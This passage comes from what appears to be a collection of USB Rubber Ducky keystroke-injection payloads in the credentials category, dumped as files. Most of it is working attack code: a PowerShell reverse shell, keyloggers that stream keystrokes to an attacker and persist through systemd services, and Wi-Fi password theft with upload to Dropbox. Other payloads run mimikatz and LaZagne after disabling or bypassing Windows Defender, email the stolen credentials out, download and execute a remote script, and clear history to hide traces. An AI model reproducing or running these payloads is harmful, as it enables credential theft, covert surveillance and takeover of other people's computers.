\"$sysInfoDir\\process_list.txt\"\n Get-Service | Out-File -FilePath \"$sysInfoDir\\service_list.txt\"\n Get-NetIPAddress | Out-File -FilePath \"$sysInfoDir\\network_config.txt\"\n}\n\nGatherSystemInfo\n\n# Network scanning\n\n\n# Retrieve Wi-Fi passwords\nfunction GetWifiPasswords {\n $wifiProfiles = netsh wlan show profiles | Select-String \"\\s:\\s(.*)$\" | ForEach-Object { $_.Matches[0].Groups[1].Value }\n\n $results = @()\n\n foreach ($profile in $wifiProfiles) {\n $profileDetails = netsh wlan show profile name=\"$profile\" key=clear\n $keyContent = ($profileDetails | Select-String \"Key Content\\s+:\\s+(.*)$\").Matches.Groups[1].Value\n $results += [PSCustomObject]@{\n ProfileName = $profile\n KeyContent = $keyContent\n }\n }\n\n $results | Format-Table -AutoSize\n\n # Save results to a file\n $results | Out-File -FilePath \"$duckletter\\$env:USERNAME\\WiFi_Details.txt\"\n}\n\nGetWifiPasswords\n\n# Reverse shell\nfunction ReverseShell {\n param(\n [string]$ip,\n [int]$port\n )\n\n $client = New-Object System.Net.Sockets.TCPClient($ip, $port)\n $stream = $client.GetStream()\n [byte[]]$bytes = 0..65535 | ForEach-Object {0}\n while (($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {\n $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i)\n $sendback = (Invoke-Expression $data 2>&1 | Out-String)\n $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '\n $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)\n $stream.Write($sendbyte, 0, $sendbyte.Length)\n $stream.Flush()\n }\n $client.Close()\n}\n\nReverseShell -ip $IP -port $PORT\n\n# Re-enable Windows Defender real-time monitoring\nSet-MpPreference -DisableRealtimeMonitoring $false\n\nexit\n" }, { "path": "payloads/library/credentials/DuckyLogger/README.md", "content": "## About:\n* Title: DuckyLogger\n* Description: Key logger which sends each and every key stroke of target remotely/locally.\n* AUTHOR: drapl0n\n* Version: 1.0\n* Category: Credentials\n* Target: Unix-like operating systems with systemd.\n* Attackmodes: HID\n\n## DuckyLogger: DuckyLogger is a Key Logger which captures every key stroke of traget and send them to attacker.\n\n### Features:\n* Live keystroke capturing.\n* Detailed key logs.\n* Persistent\n* Autostart payload on boot.\n\n### Workflow:\n* Encoding payload and injecting on target's system.\n* Checks whether internet is connected to the target system. \n* If internet is connected then it sends raw keystrokes to attacker. \n* Attacker processes raw keystrokes. \n\n### Changes to be made in payload:\n* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `43`.\n* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `59`.\n\n### Usage:\n1. Encode payload.txt and inject into target's system.\n2. Start netcat listner on attacking system:\n\n* `nc -lvp > ` use this command to create new logfile with raw keystrokes.\n* `nc -lvp >> ` use this command to append raw keystrokes to existing logfile.\n3. Process raw keystrokes using DuckyLoggerDecoder utility:\n```\n./duckyLoggerDecoder\nDuckyLoggerDecoder is used to decode raw key strokes acquired by duckyLogger.\n\nUsage: \nDecode captured log: [./duckyLoggerDecoder -f -m -o ]\n\nOptions:\n-f Specify Log file.\n-m Select Mode(normal|informative)\n-o Specify Output file.\n-h For this banner.\n```\n\n#### Support me if you like my work:\n* https://twitter.com/drapl0n\n" }, { "path": "payloads/library/credentials/DuckyLogger/duckyLoggerDecoder", "content": "usage () { \n\techo -e \"DuckyLoggerDecoder is used to decode raw key strokes acquired by duckyLogger.\\n\"\n\techo -e \"Usage: \\nDecode captured log:\\t[./duckyLoggerDecoder -f -m -o ]\"; \n\techo -e \"\\nOptions:\"\n\techo -e \"-f\\tSpecify Log file.\"\n\techo -e \"-m\\tSelect Mode(normal|informative)\"\n\techo -e \"-o\\tSpecify Output file.\"\n\techo -e \"-h\\tFor this banner.\"\n}\nwhile getopts o:m:f:h: flag\ndo\n case \"${flag}\" in\n o) output=$OPTARG ;;\n m) mode=$OPTARG ;;\n\tf) filename=$OPTARG ;;\n\th) help=$OPTARG ;;\n\t*)\n\t\t\tusage\n exit 1\n esac\ndone\n\nif [ -z \"$output\" ] && [ -z \"$filename\" ]; then\n\tusage\n exit 1\nfi\nif [ -z \"$filename\" ]; then\n echo -e \"DuckyLogDecoder: Missing option \\\"-f\\\"(Log file not specified).\\nUse \\\"-h\\\" for more information.\" >&2\n\texit 1\nfi\nif [ -z \"$output\" ]; then\n echo -e \"DuckyLogDecoder: Missing option \\\"-o\\\"(Output file not specified).\\nUse \\\"-h\\\" for help.\" >&2\n\texit 1\nfi\nif [ -z \"$mode\" ]; then\n echo -e \"DuckyLogDecoder: Missing option \\\"-m\\\"(Mode not specified).\\nUse \\\"-h\\\" for help.\" >&2\n exit 1\nfi\nif [ \"$mode\" != \"informative\" ] && [ \"$mode\" != \"normal\" ]; then\n echo -e \"DuckyLogDecoder: Invalid mode \\\"$mode\\\".\\nUse \\\"-h\\\" for help.\" >&2\n exit 1\nfi\nif [ \"$mode\" == \"normal\" ] ; then\n awk 'BEGIN{while ((\"xmodmap -pke\" | getline) > 0) k[$2]=$4} {print $0 \"[\" k [$NF] \"]\"}' $filename | grep press | awk '{print $4}' > $output\n exit 1\nfi\nif [ \"$mode\" == \"informative\" ] ; then\n awk 'BEGIN{while ((\"xmodmap -pke\" | getline) > 0) k[$2]=$4} {print $0 \"[\" k [$NF] \"]\"}' $filename > $output\n exit 1\nfi\n" }, { "path": "payloads/library/credentials/DuckyLogger/payload.txt", "content": "REM Title: DuckyLogger\nREM Description: Key logger which sends each and every key stroke of target remotely/locally.\nREM AUTHOR: drapl0n\nREM Version: 1.0\nREM Category: Credentials\nREM Target: Unix-like operating systems with systemd\nREM Attackmodes: HID\n\nREM [Note]\nREM Visit https://github.com/drapl0n/DuckyLogger for usage and other important instructions.\n\nREM [keeping tracks clear]\nDELAY 500\nCTRL-ALT t\nDELAY 400\nSTRING export HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE\nENTER\nDELAY 100\n\nREM [creating key logging mechanism]\nSTRING mkdir /var/tmp/.system\nENTER\nDELAY 100\nSTRING echo \"/var/tmp/.system/./xinput list | grep -Po 'id=\\K\\d+(?=.*slave\\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test\" > /var/tmp/.system/sys \nENTER\nDELAY 100\nSTRING chmod +x /var/tmp/.system/sys\nENTER\nDELAY 100\n\nREM [importing xinput]\nSTRING cd /var/tmp/.system/\nENTER\nDELAY 100\nSTRING wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\\?raw=true\nENTER\nDELAY 2500\nSTRING chmod +x xinput\nENTER\nDELAY 100\n\nREM [creating reverse shell]\nSTRING echo -e \"while :\\ndo\\n\\tping -c 5 0.0.0.0\\n\\tif [ $? -eq 0 ]; then\\n\\t\\tphp -r '\\$sock=fsockopen(\\\"0.0.0.0\\\",4444);exec(\"\\\"/var/tmp/.system/sys -i \"<&3 >&3 2>&3\"\\\"\");'\\n\\tfi\\ndone\" > /var/tmp/.system/systemBus\nENTER\nDELAY 100\nSTRING chmod +x /var/tmp/.system/systemBus\nENTER\nDELAY 100\n\nREM [creating systemd service to execute payload on boot]\nSTRING mkdir -p ~/.config/systemd/user\nENTER\nDELAY 200\nSTRING echo -e \"[Unit]\\nDescription= System BUS handler\\n\\n[Service]\\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\\nRestart=on-failure\\nSuccessExitStatus=3 4\\nRestartForceExitStatus=3 4\\n\\n[Install]\\nWantedBy=default.target\" > ~/.config/systemd/user/systemBUS.service\nENTER\nDELAY 100\n\nREM [creating reboot script incase if listner stops or targets internet connection gets lost] \nSTRING echo \"while true; do systemctl --user restart systemBUS.service; sleep 15m; done\" > /var/tmp/.system/reboot\nENTER\nDELAY 100\nSTRING chmod +x /var/tmp/.system/reboot\nENTER\nDELAY 100\n\nREM [creating systemd service to execute payload on boot]\nSTRING echo -e \"[Unit]\\nDescription= System BUS handler reboot.\\n\\n[Service]\\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\\nRestart=on-failure\\nSuccessExitStatus=3 4\\nRestartForceExitStatus=3 4\\n\\n[Install]\\nWantedBy=default.target\" > ~/.config/systemd/user/reboot.service\nENTER\nDELAY 100\n\nREM [enabling service]\nSTRING systemctl --user daemon-reload\nENTER\nDELAY 300\nSTRING systemctl --user enable --now systemBUS.service\nENTER\nDELAY 150\nSTRING systemctl --user enable --now reboot.service\nENTER\nDELAY 100\n\nREM [autostarting service on terminal/shell launch]\nSTRING echo -e \"ls -a | grep 'zshrc' &> /dev/null\\nif [ \\$? = 0 ]; then\\n\\techo \\\"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\\\" >> ~/.zshrc\\nfi\\n\\nls -a | grep 'bashrc' &> /dev/null\\nif [ \\$? = 0 ]; then\\n\\techo \\\"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\\\" >> ~/.bashrc\\nfi\" > ~/tmmmp\nENTER\nDELAY 100\nSTRING chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit\nENTER\n" }, { "path": "payloads/library/credentials/DuckyLogger2/README.md", "content": "## About:\n* Title: DuckyLogger 2.0\n* Description: Keylogger, which sends each and every keystroke of the target remotely/locally.\n* AUTHOR: drapl0n\n* Version: 2.0\n* Category: Credentials.\n* Target: Unix-like operating systems with systemd.\n* Attackmodes: HID.\n\n## DuckyLogger 2.0 is the most efficient version of the original DuckyLogger, which captures every keystroke of the traget and sends it back to the attacker.\n\n### Features:\n* Live keystroke capturing.\n* Detailed key logs.\n* Persistent.\n* Autostart payload on boot.\n\n### What's new ?\n* No trigger from the target's end is required.\n* Completely autostarts the payload on boot.\n* Removed unnecessary script blocks.\n* No need to run two different services.\n\n### Workflow:\n* Encoding payload and injecting it into the target's system.\n* Checks whether the internet is connected to the target system.\n* If the internet is connected, then it sends raw keystrokes to the attacker. \n* Attacker processes raw keystrokes.\n\n### Changes to be made in payload:\n* Replace ip (0.0.0.0) and port number (4444) with your server's ip address and port number on line no. `43`.\n* Increase/Decrease time interval to restart service periodically (default is 5 minutes), on line no. `59`.\n\n### Usage:\n1. Encode payload.txt and inject it into the target's system.\n2. Start Netcat listner on the attacking system:\n\n* `nc -lvp > ` use this command to create new a logfile with raw keystrokes.\n* `nc -lvp >> ` use this command to append raw keystrokes to an existing log file.\n3. Process raw keystrokes using the DuckyLoggerDecoder utility:\n```\n./duckyLoggerDecoder\nDuckyLoggerDecoder is used to decode raw key strokes acquired by duckyLogger.\n\nUsage: \nDecode captured log: [./duckyLoggerDecoder -f -m -o ]\n\nOptions:\n-f Specify the log file.\n-m Select Mode(normal|informative)\n-o Specify an output file.\n-h For this banner.\n```\n\n#### Support me if you like my work:\n* https://twitter.com/drapl0n\n" }, { "path": "payloads/library/credentials/DuckyLogger2/duckyLoggerDecoder", "content": "usage () { \n\techo -e \"\\nDuckyLoggerDecoder is used to decode raw key strokes acquired by DuckyLogger.\\n\"\n\techo -e \"Usage: \\nDecode captured logs:\\t[./duckyLoggerDecoder -f -m -o ]\"; \n\techo -e \"\\nOptions:\"\n\techo -e \"-f\\tSpecify the log file.\"\n\techo -e \"-m\\tSelect Mode(normal|informative)\"\n\techo -e \"-o\\tSpecify an output file.\"\n\techo -e \"-h\\tFor this banner.\"\n}\nwhile getopts o:m:f:h: flag\ndo\n case \"${flag}\" in\n o) output=$OPTARG ;;\n m) mode=$OPTARG ;;\n\tf) filename=$OPTARG ;;\n\th) help=$OPTARG ;;\n\t*)\n\t\t\tusage\n exit 1\n esac\ndone\n\nif [ -z \"$output\" ] && [ -z \"$filename\" ]; then\n\tusage\n exit 1\nfi\nif [ -z \"$filename\" ]; then\n echo -e \"DuckyLoggerDecoder: Missing option \\\"-f\\\"(Log file not specified).\\nUse \\\"-h\\\" for more information.\" >&2\n\texit 1\nfi\nif [ -z \"$output\" ]; then\n echo -e \"DuckyLoggerDecoder: Missing option \\\"-o\\\"(Output file not specified).\\nUse \\\"-h\\\" for help.\" >&2\n\texit 1\nfi\nif [ -z \"$mode\" ]; then\n echo -e \"DuckyLoggerDecoder: Missing option \\\"-m\\\"(Mode not specified).\\nUse \\\"-h\\\" for help.\" >&2\n exit 1\nfi\nif [ \"$mode\" != \"informative\" ] && [ \"$mode\" != \"normal\" ]; then\n echo -e \"DuckyLoggerDecoder: Invalid mode \\\"$mode\\\".\\nUse \\\"-h\\\" for help.\" >&2\n exit 1\nfi\nif [ \"$mode\" == \"normal\" ] ; then\n awk 'BEGIN{while ((\"xmodmap -pke\" | getline) > 0) k[$2]=$4} {print $0 \"[\" k [$NF] \"]\"}' $filename | grep press | awk '{print $4}' > $output\n exit 1\nfi\nif [ \"$mode\" == \"informative\" ] ; then\n awk 'BEGIN{while ((\"xmodmap -pke\" | getline) > 0) k[$2]=$4} {print $0 \"[\" k [$NF] \"]\"}' $filename > $output\n exit 1\nfi\n" }, { "path": "payloads/library/credentials/DuckyLogger2/payload.txt", "content": "REM Title: DuckyLogger 2.0\nREM Description: Keylogger which sends each and every keystroke of the target remotely/locally.\nREM AUTHOR: drapl0n\nREM Version: 2.0\nREM Category: Credentials\nREM Target: Unix-like operating systems with systemd.\nREM Attackmodes: HID\n\nREM [Note]\nREM Visit https://github.com/drapl0n/DuckyLogger2/README.md for usage and other important instructions.\n\nREM [keeping tracks clear]\nDELAY 500\nCTRL-ALT t\nDELAY 400\nSTRING export HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE\nENTER\nDELAY 100\n\nREM [creating key logging mechanism]\nSTRING mkdir /var/tmp/.system\nENTER\nDELAY 100\nSTRING echo \"/var/tmp/.system/./xinput list | grep -Po 'id=\\K\\d+(?=.*slave\\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test\" > /var/tmp/.system/sys \nENTER\nDELAY 100\nSTRING chmod +x /var/tmp/.system/sys\nENTER\nDELAY 100\n\nREM [importing xinput]\nSTRING cd /var/tmp/.system/\nENTER\nDELAY 100\nSTRING wget --no-check-certificate --content-disposition https://github.com/drapl0n/DuckyLogger/blob/main/xinput\\?raw=true\nENTER\nDELAY 2500\nSTRING chmod +x xinput\nENTER\nDELAY 100\n\nREM [creating reverse shell]\nSTRING echo -e \"while :\\ndo\\n\\tping -c 5 0.0.0.0\\n\\tif [ $? -eq 0 ]; then\\n\\t\\tphp -r '\\$sock=fsockopen(\\\"0.0.0.0\\\",4444);exec(\"\\\"/var/tmp/.system/sys -i \"<&3 >&3 2>&3\"\\\"\");'\\n\\tfi\\ndone\" > /var/tmp/.system/systemBus\nENTER\nDELAY 100\nSTRING chmod +x /var/tmp/.system/systemBus\nENTER\nDELAY 100\n\nREM [creating systemd service to execute payload on boot]\nSTRING mkdir -p ~/.config/systemd/user\nENTER\nDELAY 200\nSTRING echo -e \"[Unit]\\nDescription= System BUS handler\\n\\n[Service]\\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\\nRestart=always\\nType=forking\\n\\n[Install]\\nWantedBy=default.target\" > ~/.config/systemd/user/systemBUS.service\nENTER\nDELAY 100\n\nREM [creating systemd timer unit] \nSTRING echo -e \"[Unit]\\nDescription= SystemBUS Timer\\n\\n[Timer]\\nOnBootSec=60seconds\\nOnUnitActiveSec=300seconds\\n\\n[Install]\\nWantedBy=timers.target\" > ~/.config/systemd/user/systemBUS.timer\nENTER\nDELAY 100\n\nREM [enabling service]\nSTRING systemctl --user daemon-reload\nENTER\nDELAY 300\nSTRING systemctl --user enable --now systemBUS.service && systemctl --user enable --now systemBUS.timer\nENTER\nDELAY 150\nSTRING exit\nENTER\n" }, { "path": "payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/README.md", "content": " \n# Exfiltrate WiFi Passwords - Linux ✅\n\nA script used to exfiltrate the wifi passwords on a Linux machine.\n\n**Category**: Exfiltrate, Credentials, Execution\n\n## Description\n\nA script used to exfiltrate the wifi passwords on a Linux machine.\n\nOpens a shell, get the WiFi names, get the passwords using nmcli, send the result to Dropbox, erase traces.\n\n## Getting Started\n\n### Dependencies\n\n* Internet Connection\n* Dropbox Token\n* Permissions\n\n### Settings\n\n* Set the Dropbox token\n* Set the sudo password\n\n## Credits\n\n

Aleff :octocat:

\n
\n\n \n \n \n \n
\n \n \n \n
Github\n 		\n \n \n \n
Linkedin\n
\n
\n" }, { "path": "payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt", "content": "\nREM #######################################################\nREM # |\nREM # Title : Exfiltrate Wifi Passwords - Linux |\nREM # Author : Aleff |\nREM # Version : 1.0 |\nREM # Category : Exfiltration, Credentials, Execution |\nREM # Target : Linux |\nREM # |\nREM #######################################################\n\nREM Requirements:\nREM - Permissions\nREM - Internet connection\nREM - Dropbox Token\n\nDELAY 1000\nCTRL-ALT t\nDELAY 2000\n\n\nREM #### PREREQUISITES SECTION ####\n\n\nREM Required: You need to know the sudo password and replace 'example' with this\nDEFINE SUDO_PASS example\nSTRING sudo su\nENTER\n\nDELAY 1000\nSTRING SUDO_PASS\nENTER\n\nDELAY 2000\nREM Required: Set here your Dropbox access TOKEN\nDEFINE TOKEN example\nSTRING ACCESS_TOKEN=\"\nSTRING TOKEN\nSTRING \"\nENTER\n\n\nREM #### ZIP SECTION ####\n\n\nDELAY 500\nSTRING RANDOM=$(shuf -i 1-999999999999 -n 1)\nENTER\n\nDELAY 500\nSTRING ZIP_NAME=\"$RANDOM.zip\"\nENTER\n\nDELAY 500\nSTRING TMP_FOLDER_PATH=$(mktemp -d -p \"/home\" prefix-XXXXXXXXXX)\nENTER\n\nDELAY 500\nSTRING ZIP_PATH=\"/home/$ZIP_NAME\"\nENTER\n\n\nREM #### WiFi && ZIP SECTION ####\n\n\nREM Get all WiFi data\nSTRING for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do\nENTER\nDELAY 500\nSTRING nmcli connection show $conn >> \"$TMP_FOLDER_PATH/output_verbose.txt\" -\nENTER\nDELAY 500\nSTRING nmcli connection show $conn | grep psk >> \"$TMP_FOLDER_PATH/output.txt\" -\nENTER\nDELAY 500\nSTRING done\nENTER\nDELAY 500\nREM Wifi exfiltration command time - It depends\nDELAY 1000\n\nSTRING zip -r \"$ZIP_PATH\" \"$TMP_FOLDER_PATH\"\nREM Zip operation time - It depends\nDELAY 3000\n\n\nREM #### EXFILTRATE SECTION ####\n\n\nREM Set yout Dropbox folder name\nDEFINE DROPBOX_FOLDER_NAME example\nSTRING DROPBOX_FOLDER=\"/\nENTER\nSTRING DROPBOX_FOLDER_NAME\nENTER\nSTRING \"\nENTER\nDELAY 500\n\nDEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload\nSTRING curl -X POST\nSTRING DROPBOX_API_CONST\nSTRING --header \"Authorization: Bearer $ACCESS_TOKEN\" --header \"Dropbox-API-Arg: {\\\"path\\\": \\\"$DROPBOX_FOLDER\\\",\\\"mode\\\": \\\"add\\\",\\\"autorename\\\": true,\\\"mute\\\": false}\" --header \"Content-Type: application/octet-stream\" --data-binary \"@$ZIP_PATH\"\nENTER\n\n\nREM #### REMOVE TRACES ####\n\n\nDELAY 2000\nSTRING history -c\nENTER\n\nDELAY 500\nSTRING rm -rf \"$TMP_FOLDER_PATH\"\nENTER\n\nDELAY 500\nSTRING rm -rf \"$ZIP_PATH\"\nENTER\n\nDELAY 500\nSTRING exit\nENTER\n\nDELAY 500\nSTRING exit\nENTER\n" }, { "path": "payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/script.sh", "content": "#!/bin/bash\n\nfor conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do\n nmcli connection show $conn >> \"$TMP_FOLDER_PATH/output_verbose.txt\" -\n nmcli connection show $conn | grep psk >> \"$TMP_FOLDER_PATH/output.txt\" -\ndone\n" }, { "path": "payloads/library/credentials/Funni_Stick_V3/Funni_Stick_V3", "content": "REM -----Title: Funni Stick V3\nREM -----Author: Maker (https://github.com/MakeshiftMaker)\nREM -----Desc: A varient of Win_Pass_Grabber by makozort but not reliant on Internet potentially ignoring any server-side-issues with Downloading/Uploading Files and Logs\nREM -----Your Rubber-Ducky will has to run on Twin-Duck Firmware for this to work (see README.txt)\nREM -----Target: Logged in Win10 System with Admin access (maybe Win7 too)\nREM -----ONLY USE THIS ON MACHINES YOU HAVE PERMISSION TO PENTEST, I'M NOT LIABLE FOR ANY MISCHIEF YOU MIGHT CAUSE. I KNOW YOU ARE GOING TO IGNORE THIS. THIS TEXT IS MORE FOR ME THAN IT IS FOR YOU\n\nREM -----Set Default delay to 350 for a midrange computer, for faster computers/testing this can be decreased to 250\nDEFAULT_DELAY 350\nREM -----Delay of 1.5 seconds to let the \"Keyboard\" initialize\nDELAY 1500\n\nREM -----open Powershell as Admin\nGUI r\nSTRING powershell\nCTRL-SHIFT ENTER\nDELAY 1000\nLEFT\nENTER\nDELAY 500\n\nREM -----This long boy saves the Drive-Letter (E:, F:, G:) into a local variable called duckletter by id'ing it from its Size. This way we can find and execute things saved on there\nREM -----There is propably a better way to do this but i havent figured it out yet\nSTRING $duckletter = Get-WmiObject -Query \"select * from win32_diskdrive where Size=123379200\" | %{gwmi -Query \"ASSOCIATORS OF {Win32_DiskDrive.DeviceID=`\"$($_.DeviceID.replace('\\','\\\\'))`\"} WHERE AssocClass = Win32_DiskDriveToDiskPartition\"} | %{gwmi -Query \"ASSOCIATORS OF {Win32_DiskPartition.DeviceID=`\"$($_.DeviceID)`\"} WHERE AssocClass = Win32_LogicalDiskToPartition\"} | %{$_. deviceid}\nENTER\nREM -----Lets Disable the antivirus (for now)\nSTRING Import-Module Defender\nENTER\nSTRING Set-MpPreference -ExclusionPath $duckletter\nENTER\nREM -----Switch to the Ducky\nSTRING cd $duckletter\nENTER\nREM -----Run Mimikatz and save the output onto a .txt file named after the UserName\nSTRING .\\pw.exe > $env:UserName`.txt -and type $env:UserName`.txt\nENTER\nSTRING privilege::debug\nENTER\nSTRING sekurlsa::logonPasswords full\nENTER\nSTRING exit\nENTER\n\nREM -----Cleanup Time!\nREM -----Lets Enable the antivirus again\nSTRING Remove-MpPreference -ExclusionPath $duckletter\nENTER\nREM -----remove Powerhsell history\nSTRING Remove-Item (Get-PSreadlineOption).HistorySavePath\nENTER\nSTRING exit\nENTER\n" }, { "path": "payloads/library/credentials/Funni_Stick_V3/README.txt", "content": "Funni Stick V3 is the third generation of Maker Inc. Funni Stick Products.\r\nSteal Windows Passwords in 30 Seconds (or less)!\r\n\r\nIt runs on the same core principle as the \"Simple_User_Password_Grabber\" by makozort (https://github.com/makozort thank you makozort!)\r\nThis time using the Twin Duck Firmware on the Rubber-Ducky and a couple of optimiziations it's just the slightest bit faster + it doesnt require Internet access to work potentailly bypassing any firewall/network restrictions.\r\nOne less Dependancy is always good.\r\n\r\nFor this to work youll need 2 things saved on the Rubber ducky\r\n1. The Funni_Stick_V3 Script (in inject.bin format)\r\n2. mimikatz.exe renamed to pw.exe (if you really want to you can change this if you adjust the Funni_Stick_V3 script)\r\n\r\nUsers and Password(hashes) will be saved back onto the stick named after the Username of the machine it was run on for easy identification.(slick right?)\r\nIt is recommended that you pull out the Ducky after everything is done asap because windows defender might delete your copy of mimikatz.exe\r\nI tried to be fancy and include a powershell command that automatically ejects the drive. But when i tested it on another USB, the ejection did work, but now i cant plug them back in. Ive bricked 3 USB Sticks this way. Feel free to yell a soloution my way.\r\n" }, { "path": "payloads/library/credentials/Hasta lasagna!/Hasta Lasagna.ps1", "content": "# Function from https://gist.github.com/lalibi/3762289efc5805f8cfcf (Hide Powershell Window)\nfunction Set-WindowState {\n <#\n .LINK\n https://gist.github.com/Nora-Ballard/11240204\n #>\n\n [CmdletBinding(DefaultParameterSetName = 'InputObject')]\n param(\n [Parameter(Position = 0, Mandatory = $true, ValueFromPipeline = $true)]\n [Object[]] $InputObject,\n\n [Parameter(Position = 1)]\n [ValidateSet('FORCEMINIMIZE', 'HIDE', 'MAXIMIZE', 'MINIMIZE', 'RESTORE',\n 'SHOW', 'SHOWDEFAULT', 'SHOWMAXIMIZED', 'SHOWMINIMIZED',\n 'SHOWMINNOACTIVE', 'SHOWNA', 'SHOWNOACTIVATE', 'SHOWNORMAL')]\n [string] $State = 'SHOW',\n [switch] $SuppressErrors = $false,\n [switch] $SetForegroundWindow = $false\n )\n\n Begin {\n $WindowStates = @{\n 'FORCEMINIMIZE' = 11\n 'HIDE' = 0\n 'MAXIMIZE' = 3\n 'MINIMIZE' = 6\n 'RESTORE' = 9\n 'SHOW' = 5\n 'SHOWDEFAULT' = 10\n 'SHOWMAXIMIZED' = 3\n 'SHOWMINIMIZED' = 2\n 'SHOWMINNOACTIVE' = 7\n 'SHOWNA' = 8\n 'SHOWNOACTIVATE' = 4\n 'SHOWNORMAL' = 1\n }\n\n $Win32ShowWindowAsync = Add-Type -MemberDefinition @'\n[DllImport(\"user32.dll\")]\npublic static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);\n[DllImport(\"user32.dll\", SetLastError = true)]\npublic static extern bool SetForegroundWindow(IntPtr hWnd);\n'@ -Name \"Win32ShowWindowAsync\" -Namespace Win32Functions -PassThru\n\n if (!$global:MainWindowHandles) {\n $global:MainWindowHandles = @{ }\n }\n }\n\n Process {\n foreach ($process in $InputObject) {\n $handle = $process.MainWindowHandle\n\n if ($handle -eq 0 -and $global:MainWindowHandles.ContainsKey($process.Id)) {\n $handle = $global:MainWindowHandles[$process.Id]\n }\n\n if ($handle -eq 0) {\n if (-not $SuppressErrors) {\n Write-Error \"Main Window handle is '0'\"\n }\n continue\n }\n\n $global:MainWindowHandles[$process.Id] = $handle\n\n $Win32ShowWindowAsync::ShowWindowAsync($handle, $WindowStates[$State]) | Out-Null\n if ($SetForegroundWindow) {\n $Win32ShowWindowAsync::SetForegroundWindow($handle) | Out-Null\n }\n\n Write-Verbose (\"Set Window State '{1} on '{0}'\" -f $MainWindowHandle, $State)\n }\n }\n}\n\nSet-Alias -Name 'Set-WindowStyle' -Value 'Set-WindowState'\n\n# Disable real time protection\nSet-MpPreference -DisableRealtimeMonitoring $true\n# Minimize window \nGet-Process -ID $PID | Set-WindowState -State HIDE\n# Create a tmp directory in the Downloads folder\n$dir = \"C:\\Users\\$env:UserName\\Downloads\\tmp\"\nNew-Item -ItemType Directory -Path $dir\n# Add an exception to Windows Defender for the tmp directory\nAdd-MpPreference -ExclusionPath $dir\n#Hide the directory\n$hide = Get-Item $dir -Force\n$hide.attributes='Hidden'\n# Download the executable\nInvoke-WebRequest -Uri \"https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe\" -OutFile \"$dir\\lazagne.exe\"\n# Execute the executable and save output to a file\n& \"$dir\\lazagne.exe\" all > \"$dir\\output.txt\"\n\n# Exfiltrate the file\n#POST REQUEST\n#Invoke-WebRequest -Uri \"http://IP:PORT0\" -Method POST -Body Get-Content \"$dir\\output.txt\"\n\n#Mail Exfiltration\n$smtp = \"\" # Put SMTP SERVER HERE, TESTED WITH GOOGLES\n$From = \"\" # Put the SENDER HERE\n$To = \"\" # Put the RECEIVER HERE\n$smtp = \"\" # PUT YOUR SMTP SERVER HERE (TESTED WITH GOOGLE)\n$Subject = \"Ducky Rapport\"\n$Body = \"Hi, here is the Rapport\"\n\n# The password is an app-specific password if you have 2-factor-auth enabled\n$Password = \"\" | ConvertTo-SecureString -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $From, $Password\n# The smtp server used to send the file\nSend-MailMessage -From $From -To $To -Subject $Subject -Body $Body -Attachments \"$dir\\output.txt\" -SmtpServer $smtp -port 587 -UseSsl -Credential $Credential\n\n# Clean up\nRemove-Item -Path $dir -Recurse -Force\nSet-MpPreference -DisableRealtimeMonitoring $false\nRemove-MpPreference -ExclusionPath $dir\n\n# Remove the script from the system\nClear-History\n\n# Reboot the system\nRestart-Computer -Force\n" }, { "path": "payloads/library/credentials/Hasta lasagna!/payload.txt", "content": "REM TITLE \"Hasta lasagna!\"\nREM AUTHOR m4ki3lf0\nREM TARGET Approved on Win10, Probably working on Win11\nREM DESCRIPTION This will download the password exfiltration script (your modified version for your preferred exfiltration method), download execute lazagne.exe save result to a file and send it to yourself\nREM VERSION 1.0\n\nDEFAULT_DELAY 300\nDELAY 1000\nGUI r\nSTRING powershell -exec bypass -NoP\nCTRL SHIFT ENTER\nDELAY 100\nLEFT\nENTER\nDELAY 100\nSTRING iex (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/m4ki3lf0/BadUsbScripts/main/PasswordExfiltration/PasswordExfiltration.ps1')\nENTER\n" }, { "path": "payloads/library/credentials/Local_WLAN_Borrower/1.ps1", "content": "# Define the volume label you're looking for\r\n$targetLabel = \"DUCKY\"\r\n\r\n# Find the drive letter of the USB drive with the specified label\r\n$volume = Get-Volume | Where-Object { $_.FileSystemLabel -eq $targetLabel }\r\n\r\nif ($volume) {\r\n $driveLetter = $volume.DriveLetter + \":\\\"\r\n $usbPath = \"$driveLetter$env:username.txt\"\r\n $baseDestinationDir = $driveLetter\r\n Write-Output \"Drive letter found: $driveLetter\"\r\n} else {\r\n Write-Error \"Drive with label '$targetLabel' not found.\"\r\n exit\r\n}\r\n\r\n# Initialize an array to store all Wi-Fi profiles and their passwords\r\n$wifiData = @()\r\n\r\n# Get all Wi-Fi profiles\r\n$profiles = netsh wlan show profile | Select-String '(?<=All User Profile\\s+:\\s).+'\r\n\r\nforeach ($profile in $profiles) {\r\n $wlan = $profile.Matches.Value.Trim()\r\n\r\n # Get the password for the current Wi-Fi profile\r\n $passw = netsh wlan show profile $wlan key=clear | Select-String '(?<=Key Content\\s+:\\s).+'\r\n $password = if ($passw) { $passw.Matches.Value.Trim() } else { \"No Password 